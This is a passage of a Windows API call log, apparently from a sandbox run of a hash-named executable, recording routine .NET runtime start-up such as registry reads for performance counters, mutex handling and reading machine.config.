[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=27) returned 0xead1b9
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=28) returned 0xf2e4d7
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=17) returned 0x6d6d6d
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=13) returned 0xff9933
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=14) returned 0xffffff
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=26) returned 0xcc6600
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=11) returned 0xfcf7f4
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=3) returned 0xdbcdbf
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=19) returned 0x0
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=24) returned 0xe1ffff
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=23) returned 0x0
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=4) returned 0xf0f0f0
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=30) returned 0xf0f0f0
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=29) returned 0xff9933
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=7) returned 0x0
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=0) returned 0xc8c8c8
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=5) returned 0xffffff
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=6) returned 0x646464
[0116.720] GetLastError () returned 0x0
[0116.720] GetSysColor (nIndex=8) returned 0x0
[0116.720] GetLastError () returned 0x0
[0120.212] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x76d1e0
[0120.213] GetLastError () returned 0x0
[0120.220] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x76d048
[0120.220] GetLastError () returned 0x0
[0120.299] AdjustWindowRectEx (in: lpRect=0x19e6ec, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19e6ec) returned 1
[0120.941] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ae20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0120.941] GetLastError () returned 0x0
[0120.943] GetCurrentProcessId () returned 0xaf0
[0120.975] GetComputerNameW (in: lpBuffer=0x786f40, nSize=0x27316d8 | out: lpBuffer="XC64ZB", nSize=0x27316d8) returned 1
[0120.977] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET Data Provider for SqlServer\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19b280 | out: phkResult=0x19b280*=0x350) returned 0x0
[0120.979] RegQueryValueExW (in: hKey=0x350, lpValueName="Library", lpReserved=0x0, lpType=0x19b2bc, lpData=0x0, lpcbData=0x19b2b8*=0x0 | out: lpType=0x19b2bc*=0x2, lpData=0x0, lpcbData=0x19b2b8*=0x48) returned 0x0
[0120.992] RegQueryValueExW (in: hKey=0x350, lpValueName="Library", lpReserved=0x0, lpType=0x19b2bc, lpData=0x786f40, lpcbData=0x19b2b8*=0x48 | out: lpType=0x19b2bc*=0x2, lpData="%systemroot%\\system32\\netfxperf.dll", lpcbData=0x19b2b8*=0x48) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19b2c8, lpData=0x0, lpcbData=0x19b2c4*=0x0 | out: lpType=0x19b2c8*=0x4, lpData=0x0, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19b2c8, lpData=0x19b2b4, lpcbData=0x19b2c4*=0x4 | out: lpType=0x19b2c8*=0x4, lpData=0x19b2b4*=0x1, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="First Counter", lpReserved=0x0, lpType=0x19b2c8, lpData=0x0, lpcbData=0x19b2c4*=0x0 | out: lpType=0x19b2c8*=0x4, lpData=0x0, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegQueryValueExW (in: hKey=0x350, lpValueName="First Counter", lpReserved=0x0, lpType=0x19b2c8, lpData=0x19b2b4, lpcbData=0x19b2c4*=0x4 | out: lpType=0x19b2c8*=0x4, lpData=0x19b2b4*=0x1acc, lpcbData=0x19b2c4*=0x4) returned 0x0
[0120.993] RegCloseKey (hKey=0x350) returned 0x0
[0120.995] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net data provider for sqlserver\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19b270 | out: phkResult=0x19b270*=0x350) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19b2b8, lpData=0x0, lpcbData=0x19b2b4*=0x0 | out: lpType=0x19b2b8*=0x4, lpData=0x0, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19b2b8, lpData=0x19b2a4, lpcbData=0x19b2b4*=0x4 | out: lpType=0x19b2b8*=0x4, lpData=0x19b2a4*=0x3, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19b2b8, lpData=0x0, lpcbData=0x19b2b4*=0x0 | out: lpType=0x19b2b8*=0x4, lpData=0x0, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19b2b8, lpData=0x19b2a4, lpcbData=0x19b2b4*=0x4 | out: lpType=0x19b2b8*=0x4, lpData=0x19b2a4*=0x20000, lpcbData=0x19b2b4*=0x4) returned 0x0
[0120.995] RegQueryValueExW (in: hKey=0x350, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19b2b8, lpData=0x0, lpcbData=0x19b2b4*=0x0 | out: lpType=0x19b2b8*=0x3, lpData=0x0, lpcbData=0x19b2b4*=0x30a) returned 0x0
[0120.996] RegQueryValueExW (in: hKey=0x350, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19b2b8, lpData=0x2733f64, lpcbData=0x19b2b4*=0x30a | out: lpType=0x19b2b8*=0x3, lpData=0x2733f64*, lpcbData=0x19b2b4*=0x30a) returned 0x0
[0121.000] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(A;OICI;FRFWGRGW;;;AU)(A;OICI;FRFWGRGW;;;S-1-5-33)", StringSDRevision=0x1, SecurityDescriptor=0x19b224, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x19b224*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8004, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Sacl=0x0*(AclRevision=0x0, Sbz1=0x0, AclSize=0x0, AceCount=0x14, Sbz2=0x0), Dacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x30)), SecurityDescriptorSize=0x0) returned 1
[0121.003] GetLastError () returned 0x0
[0121.007] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x73db28, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x358
[0121.008] GetLastError () returned 0x0
[0121.009] MapViewOfFile (hFileMappingObject=0x358, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x73b0000
[0121.010] VirtualQuery (in: lpAddress=0x73b0000, lpBuffer=0x19b288, dwLength=0x1c | out: lpBuffer=0x19b288*(BaseAddress=0x73b0000, AllocationBase=0x73b0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
[0121.010] GetLastError () returned 0x0
[0121.010] LocalFree (hMem=0x75d2d8) returned 0x0
[0121.011] RegCloseKey (hKey=0x350) returned 0x0
[0121.015] GetVersionExW (in: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0121.015] GetLastError () returned 0x0
[0121.017] GetVersionExW (in: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0121.017] GetLastError () returned 0x0
[0121.019] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2735578, cbSid=0x19b268 | out: pSid=0x2735578*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.019] GetLastError () returned 0x0
[0121.022] CreateMutexW (lpMutexAttributes=0x27356c8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.022] GetLastError () returned 0x0
[0121.023] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.023] GetLastError () returned 0x0
[0121.023] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x273589c, cbSid=0x19b228 | out: pSid=0x273589c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b228) returned 1
[0121.023] GetLastError () returned 0x0
[0121.024] CreateMutexW (lpMutexAttributes=0x27359ac, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x0
[0121.024] GetLastError () returned 0x5
[0121.025] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net data provider for sqlserver") returned 0x35c
[0121.032] GetLastError () returned 0x5
[0121.032] WaitForSingleObject (hHandle=0x35c, dwMilliseconds=0x1f4) returned 0x0
[0121.032] GetLastError () returned 0x5
[0121.032] ReleaseMutex (hMutex=0x35c) returned 1
[0121.032] GetLastError () returned 0x5
[0121.032] CloseHandle (hObject=0x35c) returned 1
[0121.032] GetLastError () returned 0x5
[0121.033] GetCurrentProcessId () returned 0xaf0
[0121.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaf0) returned 0x35c
[0121.036] GetLastError () returned 0x5
[0121.038] GetProcessTimes (in: hProcess=0x35c, lpCreationTime=0x19b22c, lpExitTime=0x19b224, lpKernelTime=0x19b224, lpUserTime=0x19b224 | out: lpCreationTime=0x19b22c, lpExitTime=0x19b224, lpKernelTime=0x19b224, lpUserTime=0x19b224) returned 1
[0121.038] GetLastError () returned 0x5
[0121.039] CloseHandle (hObject=0x35c) returned 1
[0121.039] GetLastError () returned 0x5
[0121.039] ReleaseMutex (hMutex=0x350) returned 1
[0121.039] GetLastError () returned 0x5
[0121.039] CloseHandle (hObject=0x350) returned 1
[0121.039] GetLastError () returned 0x5
[0121.040] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27364b8, cbSid=0x19b268 | out: pSid=0x27364b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.040] GetLastError () returned 0x5
[0121.040] CreateMutexW (lpMutexAttributes=0x27365c8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.040] GetLastError () returned 0x0
[0121.040] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.040] GetLastError () returned 0x0
[0121.044] ReleaseMutex (hMutex=0x350) returned 1
[0121.044] GetLastError () returned 0x0
[0121.045] CloseHandle (hObject=0x350) returned 1
[0121.045] GetLastError () returned 0x0
[0121.045] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2736f10, cbSid=0x19b268 | out: pSid=0x2736f10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.045] GetLastError () returned 0x0
[0121.045] CreateMutexW (lpMutexAttributes=0x2737020, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.045] GetLastError () returned 0x0
[0121.045] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.045] GetLastError () returned 0x0
[0121.045] ReleaseMutex (hMutex=0x350) returned 1
[0121.046] GetLastError () returned 0x0
[0121.046] CloseHandle (hObject=0x350) returned 1
[0121.046] GetLastError () returned 0x0
[0121.046] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27376d0, cbSid=0x19b268 | out: pSid=0x27376d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.046] GetLastError () returned 0x0
[0121.046] CreateMutexW (lpMutexAttributes=0x27377e0, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.046] GetLastError () returned 0x0
[0121.046] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.046] GetLastError () returned 0x0
[0121.046] ReleaseMutex (hMutex=0x350) returned 1
[0121.046] GetLastError () returned 0x0
[0121.047] CloseHandle (hObject=0x350) returned 1
[0121.047] GetLastError () returned 0x0
[0121.047] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2737ea4, cbSid=0x19b268 | out: pSid=0x2737ea4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.047] GetLastError () returned 0x0
[0121.047] CreateMutexW (lpMutexAttributes=0x2737fb4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.047] GetLastError () returned 0x0
[0121.047] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.047] GetLastError () returned 0x0
[0121.047] ReleaseMutex (hMutex=0x350) returned 1
[0121.047] GetLastError () returned 0x0
[0121.048] CloseHandle (hObject=0x350) returned 1
[0121.048] GetLastError () returned 0x0
[0121.048] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x273867c, cbSid=0x19b268 | out: pSid=0x273867c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.048] GetLastError () returned 0x0
[0121.048] CreateMutexW (lpMutexAttributes=0x273878c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.048] GetLastError () returned 0x0
[0121.048] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.048] GetLastError () returned 0x0
[0121.048] ReleaseMutex (hMutex=0x350) returned 1
[0121.048] GetLastError () returned 0x0
[0121.048] CloseHandle (hObject=0x350) returned 1
[0121.049] GetLastError () returned 0x0
[0121.049] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2738e44, cbSid=0x19b268 | out: pSid=0x2738e44*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.049] GetLastError () returned 0x0
[0121.049] CreateMutexW (lpMutexAttributes=0x2738f54, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.049] GetLastError () returned 0x0
[0121.049] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.049] GetLastError () returned 0x0
[0121.049] ReleaseMutex (hMutex=0x350) returned 1
[0121.049] GetLastError () returned 0x0
[0121.049] CloseHandle (hObject=0x350) returned 1
[0121.049] GetLastError () returned 0x0
[0121.050] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2739610, cbSid=0x19b268 | out: pSid=0x2739610*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.050] GetLastError () returned 0x0
[0121.050] CreateMutexW (lpMutexAttributes=0x2739720, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.050] GetLastError () returned 0x0
[0121.050] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.050] GetLastError () returned 0x0
[0121.050] ReleaseMutex (hMutex=0x350) returned 1
[0121.050] GetLastError () returned 0x0
[0121.050] CloseHandle (hObject=0x350) returned 1
[0121.050] GetLastError () returned 0x0
[0121.050] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2739dd0, cbSid=0x19b268 | out: pSid=0x2739dd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.050] GetLastError () returned 0x0
[0121.051] CreateMutexW (lpMutexAttributes=0x2739ee0, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.051] GetLastError () returned 0x0
[0121.051] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.051] GetLastError () returned 0x0
[0121.051] ReleaseMutex (hMutex=0x350) returned 1
[0121.051] GetLastError () returned 0x0
[0121.051] CloseHandle (hObject=0x350) returned 1
[0121.051] GetLastError () returned 0x0
[0121.051] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x273a598, cbSid=0x19b268 | out: pSid=0x273a598*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19b268) returned 1
[0121.052] GetLastError () returned 0x0
[0121.052] CreateMutexW (lpMutexAttributes=0x273a6a8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x350
[0121.052] GetLastError () returned 0x0
[0121.052] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x1f4) returned 0x0
[0121.052] GetLastError () returned 0x0
[0121.052] ReleaseMutex (hMutex=0x350) returned 1
[0121.052] GetLastError () returned 0x0
[0121.052] CloseHandle (hObject=0x350) returned 1
[0121.052] GetLastError () returned 0x0
[0121.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19ad70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0121.776] GetLastError () returned 0x0
[0121.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19ad24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0121.776] GetLastError () returned 0x0
[0121.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ad28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0121.776] GetLastError () returned 0x0
[0122.295] GetVersionExW (in: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x786f40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0122.295] GetLastError () returned 0x0
[0122.296] GetCurrentProcess () returned 0xffffffff
[0122.296] GetLastError () returned 0x3f0
[0122.297] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ae38 | out: TokenHandle=0x19ae38*=0x368) returned 1
[0122.298] GetLastError () returned 0x3f0
[0122.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x19a9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
[0122.315] GetLastError () returned 0x0
[0122.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae7c | out: lpFileInformation=0x19ae7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0122.402] GetLastError () returned 0x0
[0122.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19a990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0122.431] GetLastError () returned 0x0
[0122.436] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae74 | out: lpFileInformation=0x19ae74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0122.436] GetLastError () returned 0x0
[0122.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19a8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0122.437] GetLastError () returned 0x0
[0122.437] SetErrorMode (uMode=0x1) returned 0x0
[0122.439] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x370
[0122.439] GetLastError () returned 0x0
[0122.440] GetFileType (hFile=0x370) returned 0x1
[0122.440] SetErrorMode (uMode=0x0) returned 0x1
[0122.441] GetFileType (hFile=0x370) returned 0x1
[0122.727] GetFileSize (in: hFile=0x370, lpFileSizeHigh=0x19ae58 | out: lpFileSizeHigh=0x19ae58*=0x0) returned 0x65b3
[0122.727] GetLastError () returned 0x0
[0122.728] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ae10, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19ae10*=0x1000, lpOverlapped=0x0) returned 1
[0122.728] GetLastError () returned 0x0
[0123.578] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19aa2c, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19aa2c*=0x1000, lpOverlapped=0x0) returned 1
[0123.578] GetLastError () returned 0x0
[0123.603] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a870, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a870*=0x1000, lpOverlapped=0x0) returned 1
[0123.603] GetLastError () returned 0x0
[0123.604] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a870, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a870*=0x1000, lpOverlapped=0x0) returned 1
[0123.604] GetLastError () returned 0x0
[0123.604] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a870, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a870*=0x1000, lpOverlapped=0x0) returned 1
[0123.604] GetLastError () returned 0x0
[0124.003] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a9a0, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a9a0*=0x1000, lpOverlapped=0x0) returned 1
[0124.003] GetLastError () returned 0x0
[0124.005] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a758, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a758*=0x5b3, lpOverlapped=0x0) returned 1
[0124.005] GetLastError () returned 0x0
[0124.005] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a8f4, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a8f4*=0x0, lpOverlapped=0x0) returned 1
[0124.005] GetLastError () returned 0x0
[0124.013] CloseHandle (hObject=0x370) returned 1
[0124.014] GetLastError () returned 0x0
[0124.030] GetCurrentProcess () returned 0xffffffff
[0124.030] GetLastError () returned 0x3f0
[0124.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x370) returned 1
[0124.030] GetLastError () returned 0x3f0
[0124.033] GetCurrentProcess () returned 0xffffffff
[0124.033] GetLastError () returned 0x3f0
